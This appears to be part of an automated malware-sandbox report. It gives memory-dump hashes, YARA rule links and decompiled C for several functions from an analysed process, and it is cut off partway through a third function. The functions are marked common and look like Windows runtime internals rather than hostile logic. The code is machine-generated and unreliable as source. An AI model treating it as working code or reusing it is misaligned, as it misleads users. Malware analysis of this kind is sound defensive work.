                                      0x00000000
                                      0x0535dc88
                                      0x0535dc81
                                      0x0535dc79
                                      0x0535dc6c
                                      0x0535dc55
                                      0x0535dc47
                                      0x0535dc43
                                      0x00000000
                                      0x0535dc36
                                      0x0535dc23
                                      0x00000000
                                      0x0535dbff
                                      0x0535dbf1
                                      0x0535dbdf
                                      0x0535db8f
                                      0x0535db92
                                      0x0535db95
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0535db95
                                      0x0535db8d
                                      0x0535db85
                                      0x0535db74
                                      0x0535dc9f
                                      0x0535dca2
                                      0x0535dcb0
                                      0x0535dcb0
                                      0x0535dad1
                                      0x053ab4e5
                                      0x053ab4c8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0535d831
                                      0x0535d80d
                                      0x00000000
                                      0x0535d800
                                      0x053ab47f
                                      0x053ab485
                                      0x00000000
                                      0x053ab485
                                      0x0535d665
                                      0x0535d652
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84d24157490aa9f256b0e7a2275b2c73a7f97c0a5102806dc7abca9774cfa969
                                      • Instruction ID: b5e17ce67e7d4817f3403c54df073117684be03e013e6b088a0141a0d40a7124
                                      • Opcode Fuzzy Hash: 84d24157490aa9f256b0e7a2275b2c73a7f97c0a5102806dc7abca9774cfa969
                                      • Instruction Fuzzy Hash: 91E1DE31B04359CFDB24DF24C894FA9B7B6FF45324F040599EC0A9B690DBB4AA85CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535849B, Relevance: .3, Instructions: 290COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E0535849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x541f9c0);
				E0539D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x5437b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0535CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E05362280( *[fs:0x30], 0x5438550);
						_t139 =  *0x5437b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0537F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0535FFB0(_t193, _t235, 0x5438550);
								L5:
								return E0539D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E05341C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x5437b9c; // 0x0
							_t235 = L05364620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x5437b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0537A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0535FFB0(_t193, _t235, 0x5438550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L053677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L053677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x5437b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x5437b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E053837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x5437b9c; // 0x0
									_t214 = L05364620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E053837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x5437b10 =  *0x5437b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x5437b04 =  *0x5437b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L053677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L053677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x5437b08 =  *0x5437b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E053857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0538F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L053677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0537A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L053677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E053896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                      0x0535849b
                                      0x0535849b
                                      0x0535849b
                                      0x0535849b
                                      0x0535849d
                                      0x053584a2
                                      0x053584a7
                                      0x053584b1
                                      0x053584d8
                                      0x00000000
                                      0x053584b3
                                      0x053584c4
                                      0x053584c9
                                      0x053584cd
                                      0x053584cf
                                      0x053584cf
                                      0x053584d6
                                      0x053584e6
                                      0x053584e9
                                      0x053584ec
                                      0x053584ef
                                      0x053584f2
                                      0x053584f4
                                      0x053584fc
                                      0x05358501
                                      0x05358506
                                      0x05358509
                                      0x053586e0
                                      0x053586e5
                                      0x053586e8
                                      0x053586ed
                                      0x053586f0
                                      0x053586f2
                                      0x053a9afd
                                      0x053a9b02
                                      0x053584da
                                      0x053584df
                                      0x053584df
                                      0x053586fa
                                      0x053586fd
                                      0x053586fe
                                      0x05358701
                                      0x05358706
                                      0x05358709
                                      0x0535870b
                                      0x00000000
                                      0x00000000
                                      0x05358711
                                      0x05358725
                                      0x05358727
                                      0x0535872a
                                      0x0535872c
                                      0x053a9af0
                                      0x053a9af5
                                      0x05358732
                                      0x05358732
                                      0x05358732
                                      0x05358735
                                      0x05358737
                                      0x05358515
                                      0x05358515
                                      0x05358518
                                      0x0535851d
                                      0x05358523
                                      0x05358527
                                      0x0535852b
                                      0x05358537
                                      0x05358539
                                      0x0535853c
                                      0x0535853e
                                      0x0535868c
                                      0x05358691
                                      0x05358699
                                      0x0535869b
                                      0x05358744
                                      0x05358748
                                      0x053586a1
                                      0x053586a1
                                      0x053586a1
                                      0x053586a4
                                      0x053586a8
                                      0x053a9bdf
                                      0x053a9bdf
                                      0x053586ae
                                      0x053586b0
                                      0x00000000
                                      0x053586b6
                                      0x00000000
                                      0x053a9be9
                                      0x053586b0
                                      0x05358544
                                      0x0535854a
                                      0x0535854d
                                      0x05358551
                                      0x0535876e
                                      0x05358778
                                      0x0535877b
                                      0x05358780
                                      0x05358557
                                      0x05358557
                                      0x0535855d
                                      0x0535855d
                                      0x0535856b
                                      0x0535856e
                                      0x05358570
                                      0x05358573
                                      0x05358576
                                      0x05358576
                                      0x05358579
                                      0x0535857b
                                      0x00000000
                                      0x00000000
                                      0x05358581
                                      0x053585a0
                                      0x053585a2
                                      0x053585a5
                                      0x053585a7
                                      0x053a9b1b
                                      0x053a9b1b
                                      0x0535862e
                                      0x0535862e
                                      0x05358631
                                      0x05358631
                                      0x05358634
                                      0x05358636
                                      0x05358669
                                      0x05358669
                                      0x0535866b
                                      0x053a9bbf
                                      0x053a9bc4
                                      0x053a9bc8
                                      0x053a9bce
                                      0x053a9bce
                                      0x05358671
                                      0x05358671
                                      0x05358674
                                      0x05358676
                                      0x053a9bae
                                      0x053a9bae
                                      0x05358676
                                      0x0535867c
                                      0x0535867e
                                      0x05358688
                                      0x05358688
                                      0x00000000
                                      0x0535867e
                                      0x05358638
                                      0x05358638
                                      0x0535863b
                                      0x0535863e
                                      0x0535863f
                                      0x05358642
                                      0x05358645
                                      0x05358648
                                      0x0535864d
                                      0x053a9b69
                                      0x053a9b6e
                                      0x053a9b7b
                                      0x053a9b81
                                      0x053a9b85
                                      0x053a9b89
                                      0x053a9ba7
                                      0x053a9b8b
                                      0x053a9b91
                                      0x053a9b9a
                                      0x053a9b9f
                                      0x053a9b9f
                                      0x05358788
                                      0x0535878d
                                      0x05358763
                                      0x05358763
                                      0x05358766
                                      0x00000000
                                      0x05358766
                                      0x053a9b70
                                      0x00000000
                                      0x053a9b70
                                      0x05358656
                                      0x0535865a
                                      0x0535865c
                                      0x05358752
                                      0x05358756
                                      0x00000000
                                      0x00000000
                                      0x0535875e
                                      0x00000000
                                      0x0535875e
                                      0x05358662
                                      0x05358662
                                      0x05358662
                                      0x05358666
                                      0x00000000
                                      0x05358666
                                      0x053585b7
                                      0x053585b9
                                      0x053585bc
                                      0x053585bf
                                      0x053585cc
                                      0x053585d1
                                      0x053585d4
                                      0x053585db
                                      0x053585de
                                      0x053585e0
                                      0x053a9b5f
                                      0x00000000
                                      0x053a9b5f
                                      0x053585e6
                                      0x053585ea
                                      0x053586c3
                                      0x053586c5
                                      0x053586c8
                                      0x053586ca
                                      0x053a9b16
                                      0x00000000
                                      0x053a9b16
                                      0x053586d6
                                      0x053585f6
                                      0x053585f6
                                      0x053585f9
                                      0x05358602
                                      0x05358606
                                      0x0535860a
                                      0x0535860b
                                      0x0535860e
                                      0x05358611
                                      0x00000000
                                      0x05358611
                                      0x053585f3
                                      0x00000000
                                      0x053585f3
                                      0x05358619
                                      0x0535861e
                                      0x0535861e
                                      0x05358621
                                      0x05358622
                                      0x05358623
                                      0x05358625
                                      0x0535862c
                                      0x00000000
                                      0x0535873d
                                      0x00000000
                                      0x0535873d
                                      0x05358737
                                      0x0535850f
                                      0x05358512
                                      0x00000000
                                      0x05358512
                                      0x00000000
                                      0x053584d6

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4db54be01bcedf1949a7ec88edf8ec16e9d91097ed0c2409ee8034858140dc2b
                                      • Instruction ID: d337e4e78a23816f64222a34412ebdf523838375422401779d931c29d860624e
                                      • Opcode Fuzzy Hash: 4db54be01bcedf1949a7ec88edf8ec16e9d91097ed0c2409ee8034858140dc2b
                                      • Instruction Fuzzy Hash: 89B18DB1F04209DFCB19DFA9C984EADFBBAFF44314F20412AE905AB655DB70A945CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537513A, Relevance: .3, Instructions: 258COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E0537513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x543d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0538D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E05362280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L05364620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0538F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0535FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x543b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0538B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                      0x05375142
                                      0x0537514c
                                      0x05375150
                                      0x05375157
                                      0x05375159
                                      0x0537515e
                                      0x05375165
                                      0x05375169
                                      0x0537516c
                                      0x05375172
                                      0x05375176
                                      0x0537517a
                                      0x0537517a
                                      0x0537517a
                                      0x0537517f
                                      0x053b6d8b
                                      0x053b6d8e
                                      0x053b6d91
                                      0x053b6d95
                                      0x053b6d98
                                      0x053b6d9c
                                      0x053b6da0
                                      0x053b6da3
                                      0x053b6da7
                                      0x053b6e26
                                      0x053b6e26
                                      0x053b6e2a
                                      0x053751f9
                                      0x053751f9
                                      0x053751fe
                                      0x053b6e33
                                      0x053b6e33
                                      0x053b6e39
                                      0x053b6e3d
                                      0x053b6e46
                                      0x053b6e50
                                      0x00000000
                                      0x00000000
                                      0x053b6e52
                                      0x053b6e53
                                      0x053b6e56
                                      0x053b6e5d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053b6e5f
                                      0x053b6e67
                                      0x053b6e77
                                      0x053b6e7f
                                      0x053b6e80
                                      0x053b6e88
                                      0x053b6e90
                                      0x053b6e9f
                                      0x053b6ea5
                                      0x053b6ea9
                                      0x053b6eb1
                                      0x053b6ebf
                                      0x00000000
                                      0x00000000
                                      0x053b6ecf
                                      0x053b6ed3
                                      0x00000000
                                      0x00000000
                                      0x053b6edb
                                      0x053b6ede
                                      0x053b6ee1
                                      0x053b6ee8
                                      0x053b6eeb
                                      0x053b6eed
                                      0x053b6ef0
                                      0x053b6ef4
                                      0x053b6ef8
                                      0x053b6efc
                                      0x00000000
                                      0x00000000
                                      0x053b6f0d
                                      0x053b6f11
                                      0x053b6f32
                                      0x053b6f37
                                      0x053b6f3b
                                      0x053b6f3e
                                      0x053b6f41
                                      0x053b6f46
                                      0x00000000
                                      0x00000000
                                      0x053b6f4c
                                      0x053b6f50
                                      0x053b6f50
                                      0x053b6f54
                                      0x053b6f62
                                      0x053b6f65
                                      0x053b6f6d
                                      0x053b6f7b
                                      0x053b6f7b
                                      0x053b6f93
                                      0x053b6f98
                                      0x053b6fa0
                                      0x053b6fa6
                                      0x053b6fb3
                                      0x053b6fb6
                                      0x053b6fbf
                                      0x053b6fc1
                                      0x053b6fd5
                                      0x053b6fda
                                      0x053b6fda
                                      0x053b6fdd
                                      0x053b6fe2
                                      0x053b6fe7
                                      0x053b6feb
                                      0x053b6fef
                                      0x053b6ff3
                                      0x0537520c
                                      0x0537520c
                                      0x0537520f
                                      0x05375215
                                      0x05375234
                                      0x0537523a
                                      0x0537523a
                                      0x05375244
                                      0x05375245
                                      0x05375246
                                      0x05375251
                                      0x05375251
                                      0x053b6f13
                                      0x053b6f17
                                      0x053b6f17
                                      0x053b6f18
                                      0x053b6f1b
                                      0x053b6f1f
                                      0x053b6f23
                                      0x00000000
                                      0x053b6f28
                                      0x05375204
                                      0x05375204
                                      0x05375208
                                      0x00000000
                                      0x05375208
                                      0x05375185
                                      0x05375188
                                      0x0537518a
                                      0x0537518e
                                      0x05375195
                                      0x053b6db1
                                      0x053b6db5
                                      0x053b6db9
                                      0x0537519b
                                      0x0537519b
                                      0x0537519e
                                      0x053751a7
                                      0x053751a9
                                      0x053751a9
                                      0x053751b5
                                      0x053751b8
                                      0x053751bb
                                      0x053751be
                                      0x053751c1
                                      0x053751c5
                                      0x053751c9
                                      0x053751cd
                                      0x053751cd
                                      0x053751d8
                                      0x053751dc
                                      0x053751e0
                                      0x053b6dcc
                                      0x053b6dd0
                                      0x053b6dd5
                                      0x053b6ddd
                                      0x053b6de1
                                      0x053b6de1
                                      0x053b6de5
                                      0x053b6deb
                                      0x053b6df1
                                      0x053b6df7
                                      0x053b6dfd
                                      0x053b6e01
                                      0x053b6e05
                                      0x053b6e09
                                      0x053b6e0d
                                      0x053b6e11
                                      0x053b6e11
                                      0x053751eb
                                      0x053b6e1a
                                      0x053b6e1f
                                      0x053b6e21
                                      0x053b6e23
                                      0x00000000
                                      0x053751f1
                                      0x053751f1
                                      0x00000000
                                      0x053751f1

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bccf2f50b632877a21d2cf6a8e9927dd53054a60996e2bb94979eee75315d36d
                                      • Instruction ID: d6fd1e5b6b2c440b68172931fcb24c5ce3ab3b2474ac28827d84bff3fac3abc9
                                      • Opcode Fuzzy Hash: bccf2f50b632877a21d2cf6a8e9927dd53054a60996e2bb94979eee75315d36d
                                      • Instruction Fuzzy Hash: C1C144756083808FD358CF28C580A6AFBF1BF88304F14496EF99A8B752D7B5E945CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053703E2, Relevance: .3, Instructions: 254COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E053703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
